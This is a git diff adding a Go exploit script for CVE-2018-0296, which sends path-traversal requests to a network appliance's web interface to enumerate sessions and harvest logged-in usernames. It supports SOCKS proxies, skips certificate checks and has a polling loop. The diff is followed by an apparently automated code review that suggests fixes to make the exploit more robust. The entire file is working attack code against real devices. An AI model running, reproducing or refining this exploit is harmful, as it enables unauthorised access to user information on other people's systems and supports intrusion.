diff --git a/CVE-2018-0296.go b/CVE-2018-0296.go
new file mode 100644
index 0000000..b7ed6a5
--- /dev/null
+++ b/CVE-2018-0296.go
@@ -0,0 +1,464 @@ +package main + +import ( + "fmt" + "time" + "net/http" + "crypto/tls" + "io/ioutil" + "os" + "net" + "golang.org/x/net/proxy" + "github.com/mkideal/cli" + "github.com/fatih/color" + "strings" +) +type argT struct { + cli.Helper + Urlstring string `cli:"u,url" usage:"Url of target device"` + //Urlfile string `cli:"U,file" usage:"File containing urls of target device"` + Sockshost string `cli:"i" usage:"IP of Socks Proxy"` + Socksport string `cli:"p" usage:"Port of Socks Proxy"` + Timesleep int `cli:"t,time" usage:"Number of seconds to sleep between loop"` + Loopmode bool `cli:"loop" usage:"Loop mode"` + //Debugmode bool `cli:"d,debug" usage:"Debug mode"` +} +func stringInSlice(str string, list []string) bool { + for _, v := range list { + if v == str { + return true + } + } + return false +} + +func main() { + cli.Run(new(argT), func(ctx *cli.Context) error { + argv := ctx.Argv().(*argT) + + var Debugmode=false + var userIDList []string + var userNameList []string + + var timeoutSec = 5 + var userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" + + var targetHost="" + if len(argv.Urlstring)>0 { + targetHost=argv.Urlstring + } + fmt.Println("[*] Checking: "+targetHost) + var firstLoop=true + + if len(argv.Sockshost)>0 && len(argv.Socksport)>0 { + dialer, err := proxy.SOCKS5("tcp", argv.Sockshost+":"+argv.Socksport, nil, &net.Dialer{ + Timeout: time.Duration(timeoutSec) * time.Second, + KeepAlive: time.Duration(timeoutSec) * time.Second, + }) + if err != nil { + fmt.Fprintln(os.Stderr, "can't connect to the proxy:", err) + os.Exit(1) + } else { + if argv.Loopmode { + var lastCount=0 + for { + httpTransport := &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + } + timeout := time.Duration(time.Duration(timeoutSec) * time.Second) + httpClient := http.Client{ + Transport: httpTransport, + Timeout: timeout, + CheckRedirect: func(req *http.Request, via 
[]*http.Request) error { + return http.ErrUseLastResponse + }, + } + httpTransport.Dial = dialer.Dial + + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if firstLoop==true { + if strings.Contains(jsonText,"///sessions") { + fmt.Println("[+] "+targetHost+color.RedString(" [Vulnerable]")) + } + } + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(jsonText,"\n") + for _, w := range splitLines1 { + splitLines2:=strings.Split(w,"','") + for _, x := range splitLines2 { + if strings.Contains(x,"'name'") { + splitLines3:=strings.Split(x,"'name':'") + //fmt.Println(splitLines3[1]) + userIDList = append(userIDList, splitLines3[1]) + } + } + } + } + } + } else { + fmt.Println(err) + } + } else { + fmt.Println(err) + } + for _, v := range userIDList { + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+v + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(v,"','") + if strings.Contains(splitLines1[0],"'name':'user:") { + splitLines2:=strings.Split(splitLines1[0],"'name':'user:") + if !stringInSlice(splitLines2[1],userNameList) { + userNameList = 
append(userNameList,splitLines2[1]) + } + } + } + + } + } + } + } + } + + if len(userNameList)>0 { + if len(userNameList)>lastCount { + fmt.Println("[*] Usernames found") + for _, v := range userNameList { + fmt.Println(v) + } + fmt.Println("\n") + } + lastCount=len(userNameList) + } + } + if argv.Timesleep > 0 { + time.Sleep(time.Duration(argv.Timesleep) * time.Second) + } else { + time.Sleep(time.Duration(10) * time.Second) + } + firstLoop=false + } + } else { + httpTransport := &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + } + + timeout := time.Duration(time.Duration(timeoutSec) * time.Second) + httpClient := http.Client{ + Transport: httpTransport, + Timeout: timeout, + CheckRedirect: func(req *http.Request, via []*http.Request) error { + return http.ErrUseLastResponse + }, + } + httpTransport.Dial = dialer.Dial + + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if strings.Contains(jsonText,"///sessions") { + fmt.Println("[+] "+targetHost+color.RedString(" [Vulnerable]")) + } + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(jsonText,"\n") + for _, w := range splitLines1 { + splitLines2:=strings.Split(w,"','") + for _, x := range splitLines2 { + if strings.Contains(x,"'name'") { + splitLines3:=strings.Split(x,"'name':'") + //fmt.Println(splitLines3[1]) + userIDList = append(userIDList, splitLines3[1]) + } + } + } + } + } + } else { + fmt.Println(err) + } + } else { + fmt.Println(err) + } + for _, v := range userIDList { + newUrl := 
targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+v + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(v,"','") + if strings.Contains(splitLines1[0],"'name':'user:") { + splitLines2:=strings.Split(splitLines1[0],"'name':'user:") + if !stringInSlice(splitLines2[1],userNameList) { + userNameList = append(userNameList,splitLines2[1]) + } + } + } + + } + } + } + } + } + + if len(userNameList)>0 { + fmt.Println("[*] Usernames found") + for _, v := range userNameList { + fmt.Println(v) + } + fmt.Println("\n") + } + } + } + } + } else { + if argv.Loopmode { + var lastCount=0 + for { + httpTransport := &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + } + + timeout := time.Duration(time.Duration(timeoutSec) * time.Second) + httpClient := http.Client{ + Transport: httpTransport, + Timeout: timeout, + CheckRedirect: func(req *http.Request, via []*http.Request) error { + return http.ErrUseLastResponse + }, + } + + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if strings.Contains(jsonText,"///sessions") { + fmt.Println("[+] "+targetHost+color.RedString(" [Vulnerable]")) + } + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range 
splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(jsonText,"\n") + for _, w := range splitLines1 { + splitLines2:=strings.Split(w,"','") + for _, x := range splitLines2 { + if strings.Contains(x,"'name'") { + splitLines3:=strings.Split(x,"'name':'") + //fmt.Println(splitLines3[1]) + userIDList = append(userIDList, splitLines3[1]) + } + } + } + } + } + } else { + fmt.Println(err) + } + } else { + fmt.Println(err) + } + for _, v := range userIDList { + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+v + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(v,"','") + if strings.Contains(splitLines1[0],"'name':'user:") { + splitLines2:=strings.Split(splitLines1[0],"'name':'user:") + if !stringInSlice(splitLines2[1],userNameList) { + userNameList = append(userNameList,splitLines2[1]) + } + } + } + + } + } + } + } + } + + if len(userNameList)>0 { + if len(userNameList)>lastCount { + fmt.Println("[*] Usernames found") + for _, v := range userNameList { + fmt.Println(v) + } + fmt.Println("\n") + } + lastCount=len(userNameList) + } + } + if argv.Timesleep > 0 { + time.Sleep(time.Duration(argv.Timesleep) * time.Second) + } else { + time.Sleep(time.Duration(10) * time.Second) + } + firstLoop=false + } + } else { + httpTransport := &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + } + + timeout := time.Duration(time.Duration(timeoutSec) * time.Second) + httpClient := http.Client{ + Transport: httpTransport, + Timeout: timeout, + CheckRedirect: func(req *http.Request, via 
[]*http.Request) error { + return http.ErrUseLastResponse + }, + } + + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if strings.Contains(jsonText,"///sessions") { + fmt.Println("[+] "+targetHost+color.RedString(" [Vulnerable]")) + } + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(jsonText,"\n") + for _, w := range splitLines1 { + splitLines2:=strings.Split(w,"','") + for _, x := range splitLines2 { + if strings.Contains(x,"'name'") { + splitLines3:=strings.Split(x,"'name':'") + userIDList = append(userIDList, splitLines3[1]) + } + } + } + } + } + } else { + fmt.Println(err) + } + } else { + fmt.Println(err) + } + for _, v := range userIDList { + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+v + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(v,"','") + if strings.Contains(splitLines1[0],"'name':'user:") { + splitLines2:=strings.Split(splitLines1[0],"'name':'user:") + if !stringInSlice(splitLines2[1],userNameList) { + userNameList = append(userNameList,splitLines2[1]) + } + } + } + + } + } + } + } + } + + if len(userNameList)>0 { + fmt.Println("[*] 
Usernames found") + for _, v := range userNameList { + fmt.Println(v) + } + fmt.Println("\n") + } + } + } + } + + return nil + }) +}
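Review bot: `userIDList` is declared once outside the `for {` in both loop-mode branches and is only ever appended to, so every iteration re-adds the IDs collected on the previous pass and the per-ID request loop grows without bound; reset it at the top of each iteration (`userIDList = userIDList[:0]`) or declare it inside the loop. The ID-parsing block compounds this by re-splitting the whole `jsonText` for every line that contains `'name'` (the inner `splitLines1:=strings.Split(jsonText,"\n")` should be splitting `v`), so each ID is appended once per matching line even on a single pass. All eight `httpClient.Do` calls read the body with `ioutil.ReadAll` but never close it; put the request/read in a helper that does `defer resp.Body.Close()`, since a bare `defer` inside these infinite loops would only run when the enclosing closure returns. `splitLines3[1]` and `splitLines2[1]` index a `strings.Split` result without checking its length, so a response that contains `'name'` but not the exact `'name':'` or `'name':'user:` delimiter panics the process — guard with `len(parts) > 1` before indexing. The `[Vulnerable]` print is gated by `firstLoop==true` in the proxy loop branch but not in the non-proxy loop branch, and the four proxy/loop branches are otherwise near-identical copies that belong in one function taking the configured `*http.Client`.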